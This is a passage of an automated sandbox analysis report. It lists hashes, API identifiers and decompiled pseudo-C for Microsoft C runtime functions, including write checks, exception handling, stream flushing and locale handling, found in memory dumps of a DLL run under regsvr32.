                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _free_nolock$_unlock
                                                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                                                    • API String ID: 2500497606-1087415141
                                                                    • Opcode ID: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                    • Instruction ID: 34f18152e293ad813cf8b9b11c4969fef8ff7405ef187e896dde4a1f66726313
                                                                    • Opcode Fuzzy Hash: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                    • Instruction Fuzzy Hash: 4121FC36629B8581EB909B59E89072DA3E4F3C4B94F609426FACE437B4CF7ED444CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                                                    • String ID: csm
                                                                    • API String ID: 933340387-1018135373
                                                                    • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                    • Instruction ID: be7caa3ba3d0a30f9fef9d29ccc0ee5b0ac29a888dcf6323555a590ed5530147
                                                                    • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                    • Instruction Fuzzy Hash: BE21FA32A0C64582DAA09B15E49076D67A0F7C0B52F611136EADE077B5CB3BD4418B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: __doserrno_invalid_parameter
                                                                    • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                    • API String ID: 4140903211-23161695
                                                                    • Opcode ID: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                    • Instruction ID: f549bc85806da522572ee7890384280d6aac56d4f037a7782e26525923b50f93
                                                                    • Opcode Fuzzy Hash: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                    • Instruction Fuzzy Hash: A2112A71A29606CAF7D0AB14ED5476E72E1F3507C9FA09125E2CD026E4D77EE504CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: __doserrno_invalid_parameter
                                                                    • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                    • API String ID: 4140903211-3042049227
                                                                    • Opcode ID: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                    • Instruction ID: 08953b95d21c5f70e3699fefb321eca4419d040150facc41ebc10b04699de718
                                                                    • Opcode Fuzzy Hash: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                    • Instruction Fuzzy Hash: F8115731E0C646DAF7A4AF24EC117AE73D0F780398FA0912692CC026E5DB7EE644CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: __doserrno_invalid_parameter
                                                                    • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                    • API String ID: 4140903211-1338331675
                                                                    • Opcode ID: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                    • Instruction ID: 8bdd68c2d8658697f17e3158693f35fff5fb9c26cbdf8bf42c76b87004d789dc
                                                                    • Opcode Fuzzy Hash: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                    • Instruction Fuzzy Hash: F0014CB1A18646C6FB90AB24EC4076D36E0F350358FB04125E28D036F5C7BED544CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer__doserrno_invalid_parameter
                                                                    • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                    • API String ID: 1098298932-1795423647
                                                                    • Opcode ID: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                    • Instruction ID: 5ff663975ae3511ed6d2782a661d896beba523f0d1828ccbc0613956f22d1229
                                                                    • Opcode Fuzzy Hash: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                    • Instruction Fuzzy Hash: CBE03960A0890696F6D4AF14EC113EE2290A740788FE14222908D072F2CB7EA605C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 16%
                                                                    			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
                                                                    				long long _v24;
                                                                    				intOrPtr _v32;
                                                                    				long long _v40;
                                                                    				signed int _v48;
                                                                    				int _v52;
                                                                    				int _v56;
                                                                    				signed int _v64;
                                                                    				long long _v72;
                                                                    				long long _t82;
                                                                    
                                                                    				_a32 = r9d;
                                                                    				_a24 = __r8;
                                                                    				_a16 = __edx;
                                                                    				_a8 = __rcx;
                                                                    				_v56 = 0;
                                                                    				if (_a48 != 0) goto 0xf9d2f5ab;
                                                                    				_a48 =  *((intOrPtr*)( *_a8 + 4));
                                                                    				if (_a64 == 0) goto 0xf9d2f5bf;
                                                                    				_v32 = 9;
                                                                    				goto 0xf9d2f5c7;
                                                                    				_v32 = 1;
                                                                    				_v64 = 0;
                                                                    				_v72 = 0;
                                                                    				r9d = _a32;
                                                                    				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                    				if (_v48 != 0) goto 0xf9d2f60b;
                                                                    				goto 0xf9d2f6f8;
                                                                    				if (0 != 0) goto 0xf9d2f652;
                                                                    				if (_v48 <= 0) goto 0xf9d2f652;
                                                                    				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
                                                                    				_t82 = _v48 + _v48 + 0x10;
                                                                    				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
                                                                    				_v24 = _t82;
                                                                    				goto 0xf9d2f65b;
                                                                    				_v24 = 0;
                                                                    				_v40 = _v24;
                                                                    				if (_v40 != 0) goto 0xf9d2f674;
                                                                    				goto 0xf9d2f6f8;
                                                                    				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
                                                                    				_v64 = _v48;
                                                                    				_v72 = _v40;
                                                                    				r9d = _a32;
                                                                    				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                    				if (_v52 == 0) goto 0xf9d2f6ea;
                                                                    				r8d = _v52;
                                                                    				_v56 = GetStringTypeW(??, ??, ??, ??);
                                                                    				E000007FE7FEF9D2F3E0(_v40);
                                                                    				return _v56;
                                                                    			}












                                                                    0x7fef9d2f570
                                                                    0x7fef9d2f575
                                                                    0x7fef9d2f57a
                                                                    0x7fef9d2f57e
                                                                    0x7fef9d2f587
                                                                    0x7fef9d2f597
                                                                    0x7fef9d2f5a4
                                                                    0x7fef9d2f5b3
                                                                    0x7fef9d2f5b5
                                                                    0x7fef9d2f5bd
                                                                    0x7fef9d2f5bf
                                                                    0x7fef9d2f5c7
                                                                    0x7fef9d2f5cf
                                                                    0x7fef9d2f5d8
                                                                    0x7fef9d2f5f9
                                                                    0x7fef9d2f602
                                                                    0x7fef9d2f606
                                                                    0x7fef9d2f60f
                                                                    0x7fef9d2f616
                                                                    0x7fef9d2f62a
                                                                    0x7fef9d2f631
                                                                    0x7fef9d2f646
                                                                    0x7fef9d2f64b
                                                                    0x7fef9d2f650
                                                                    0x7fef9d2f652
                                                                    0x7fef9d2f660
                                                                    0x7fef9d2f66b
                                                                    0x7fef9d2f66f
                                                                    0x7fef9d2f686
                                                                    0x7fef9d2f68f
                                                                    0x7fef9d2f698
                                                                    0x7fef9d2f69d
                                                                    0x7fef9d2f6bf
                                                                    0x7fef9d2f6c8
                                                                    0x7fef9d2f6d2
                                                                    0x7fef9d2f6e6
                                                                    0x7fef9d2f6ef
                                                                    0x7fef9d2f6fc

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                                                    • String ID:
                                                                    • API String ID: 2618398691-0
                                                                    • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                    • Instruction ID: 79d90a16a348acae5d1e8c33d658c717d72e619f6ed261e78ac23a31a9732c13
                                                                    • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                    • Instruction Fuzzy Hash: 9941E7726187818AD7A08B19E48476EB7E0F385795F204525EADE43BB8DB7ED484CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 20%
                                                                    			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    
                                                                    				_a8 = __ecx;
                                                                    				_v24 = 0;
                                                                    				_v16 = 0;
                                                                    				0xf9d29300();
                                                                    				_v20 = 0;
                                                                    				_v20 = _v20 + 1;
                                                                    				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
                                                                    				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
                                                                    				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
                                                                    				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                                                    				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
                                                                    				if (_a8 != 1) goto 0xf9d3ffe1;
                                                                    				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
                                                                    				_v24 = _v24 + 1;
                                                                    				goto 0xf9d40024;
                                                                    				if (_a8 != 0) goto 0xf9d40024;
                                                                    				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
                                                                    				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
                                                                    				_v16 = 0xffffffff;
                                                                    				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                                                    				goto L1;
                                                                    				__ecx = 1;
                                                                    				__eax = E000007FE7FEF9D29360(__eax, 1);
                                                                    				if (_a8 != 1) goto 0xf9d4005b;
                                                                    				__eax = _v24;
                                                                    				goto 0xf9d4005f;
                                                                    				__eax = _v16;
                                                                    				return _v16;
                                                                    			}






                                                                    0x7fef9d3ff00
                                                                    0x7fef9d3ff08
                                                                    0x7fef9d3ff10
                                                                    0x7fef9d3ff1d
                                                                    0x7fef9d3ff23
                                                                    0x7fef9d3ff33
                                                                    0x7fef9d3ff41
                                                                    0x7fef9d3ff58
                                                                    0x7fef9d3ff78
                                                                    0x7fef9d3ff92
                                                                    0x7fef9d3ffb2
                                                                    0x7fef9d3ffb9
                                                                    0x7fef9d3ffd3
                                                                    0x7fef9d3ffdb
                                                                    0x7fef9d3ffdf
                                                                    0x7fef9d3ffe6
                                                                    0x7fef9d40000
                                                                    0x7fef9d4001a
                                                                    0x7fef9d4001c
                                                                    0x7fef9d40038
                                                                    0x7fef9d4003d
                                                                    0x7fef9d40042
                                                                    0x7fef9d40047
                                                                    0x7fef9d40051
                                                                    0x7fef9d40053
                                                                    0x7fef9d40059
                                                                    0x7fef9d4005b
                                                                    0x7fef9d40063

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                                                    • String ID:
                                                                    • API String ID: 1144694634-0
                                                                    • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                    • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                                                    • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                    • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 27%
                                                                    			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                    				long long _v16;
                                                                    				long long _v24;
                                                                    				intOrPtr _v32;
                                                                    				long long _v40;
                                                                    				long long _v48;
                                                                    				intOrPtr _v52;
                                                                    				intOrPtr _v56;
                                                                    				signed int _v64;
                                                                    				long long _v72;
                                                                    				char _v80;
                                                                    				long long _v88;
                                                                    				void* _t135;
                                                                    				void* _t145;
                                                                    				void* _t147;
                                                                    				void* _t148;
                                                                    				void* _t149;
                                                                    				signed int* _t200;
                                                                    				intOrPtr _t206;
                                                                    
                                                                    				_a32 = __r9;
                                                                    				_a24 = __r8;
                                                                    				_a16 = __rdx;
                                                                    				_a8 = __rcx;
                                                                    				0xf9d24000();
                                                                    				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
                                                                    				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
                                                                    				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
                                                                    				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
                                                                    				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
                                                                    				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
                                                                    				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
                                                                    				goto 0xf9d3409c;
                                                                    				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
                                                                    				if (_a40[1] == 0) goto 0xf9d33ee4;
                                                                    				if (_a48 != 0) goto 0xf9d33ee4;
                                                                    				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
                                                                    				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
                                                                    				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
                                                                    				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
                                                                    				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
                                                                    				goto 0xf9d33e0f;
                                                                    				E000007FE7FEF9D2CF80(_a40);
                                                                    				r9d = _v56;
                                                                    				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
                                                                    				goto 0xf9d33ec7;
                                                                    				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
                                                                    				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
                                                                    				_v48 = _a8;
                                                                    				_v52 =  *((intOrPtr*)(_v48 + 0x38));
                                                                    				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
                                                                    				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
                                                                    				goto 0xf9d33e9a;
                                                                    				E000007FE7FEF9D2CF80(_a40);
                                                                    				r9d = _v52;
                                                                    				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
                                                                    				goto 0xf9d3409c;
                                                                    				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
                                                                    				goto 0xf9d34097;
                                                                    				if (_a40[3] != 0) goto 0xf9d33f59;
                                                                    				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
                                                                    				_t200 = _a40;
                                                                    				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
                                                                    				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
                                                                    				_v24 = _t200 + _a40[8];
                                                                    				goto 0xf9d33f4d;
                                                                    				_v24 = 0;
                                                                    				if (_v24 == 0) goto 0xf9d34097;
                                                                    				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
                                                                    				_t206 =  *((intOrPtr*)(_a8 + 0x30));
                                                                    				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
                                                                    				E000007FE7FEF9D2E6A0(_t135, _t206);
                                                                    				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
                                                                    				goto 0xf9d33fce;
                                                                    				_v16 = 0;
                                                                    				_v40 = _v16;
                                                                    				_t177 = _v40;
                                                                    				if (_v40 == 0) goto 0xf9d34041;
                                                                    				_v64 = _a64 & 0x000000ff;
                                                                    				_v72 = _a56;
                                                                    				_v80 = _a48;
                                                                    				_v88 = _a40;
                                                                    				_v32 = _v40();
                                                                    				goto 0xf9d34097;
                                                                    				_v64 = _a56;
                                                                    				_v72 = _a48;
                                                                    				_v80 = _a64 & 0x000000ff;
                                                                    				_v88 = _a40;
                                                                    				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
                                                                    				return 1;
                                                                    			}





















                                                                    0x7fef9d33cc0
                                                                    0x7fef9d33cc5
                                                                    0x7fef9d33cca
                                                                    0x7fef9d33ccf
                                                                    0x7fef9d33cd8
                                                                    0x7fef9d33ce4
                                                                    0x7fef9d33cf8
                                                                    0x7fef9d33d08
                                                                    0x7fef9d33d16
                                                                    0x7fef9d33d28
                                                                    0x7fef9d33d38
                                                                    0x7fef9d33d4e
                                                                    0x7fef9d33d60
                                                                    0x7fef9d33d67
                                                                    0x7fef9d33d7c
                                                                    0x7fef9d33d8e
                                                                    0x7fef9d33d9c
                                                                    0x7fef9d33db2
                                                                    0x7fef9d33dc6
                                                                    0x7fef9d33dec
                                                                    0x7fef9d33df5
                                                                    0x7fef9d33e06
                                                                    0x7fef9d33e08
                                                                    0x7fef9d33e0a
                                                                    0x7fef9d33e0f
                                                                    0x7fef9d33e2c
                                                                    0x7fef9d33e3b
                                                                    0x7fef9d33e50
                                                                    0x7fef9d33e60
                                                                    0x7fef9d33e6a
                                                                    0x7fef9d33e77
                                                                    0x7fef9d33e80
                                                                    0x7fef9d33e91
                                                                    0x7fef9d33e93
                                                                    0x7fef9d33e95
                                                                    0x7fef9d33e9a
                                                                    0x7fef9d33eb8
                                                                    0x7fef9d33ec2
                                                                    0x7fef9d33edf
                                                                    0x7fef9d33eee
                                                                    0x7fef9d33eff
                                                                    0x7fef9d33f15
                                                                    0x7fef9d33f1b
                                                                    0x7fef9d33f27
                                                                    0x7fef9d33f29
                                                                    0x7fef9d33f3d
                                                                    0x7fef9d33f42
                                                                    0x7fef9d33f44
                                                                    0x7fef9d33f53
                                                                    0x7fef9d33f67
                                                                    0x7fef9d33f79
                                                                    0x7fef9d33f8e
                                                                    0x7fef9d33f9c
                                                                    0x7fef9d33fa4
                                                                    0x7fef9d33fa6
                                                                    0x7fef9d33fbe
                                                                    0x7fef9d33fc3
                                                                    0x7fef9d33fc5
                                                                    0x7fef9d33fd3
                                                                    0x7fef9d33fd8
                                                                    0x7fef9d33fde
                                                                    0x7fef9d33fe8
                                                                    0x7fef9d33ff4
                                                                    0x7fef9d34000
                                                                    0x7fef9d3400c
                                                                    0x7fef9d34035
                                                                    0x7fef9d3403f
                                                                    0x7fef9d34049
                                                                    0x7fef9d34055
                                                                    0x7fef9d34061
                                                                    0x7fef9d3406d
                                                                    0x7fef9d34092
                                                                    0x7fef9d340a0

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _inconsistency
                                                                    • String ID: csm$csm
                                                                    • API String ID: 32975420-3733052814
                                                                    • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                    • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                                                    • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                    • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: __free_lconv_mon__free_lconv_num
                                                                    • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                                                    • API String ID: 2148069796-2706031433
                                                                    • Opcode ID: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                    • Instruction ID: 7353ab124090f0710997c18079ef38eae00693e27689a0bfa21a481d68f00224
                                                                    • Opcode Fuzzy Hash: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                    • Instruction Fuzzy Hash: F4A10E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
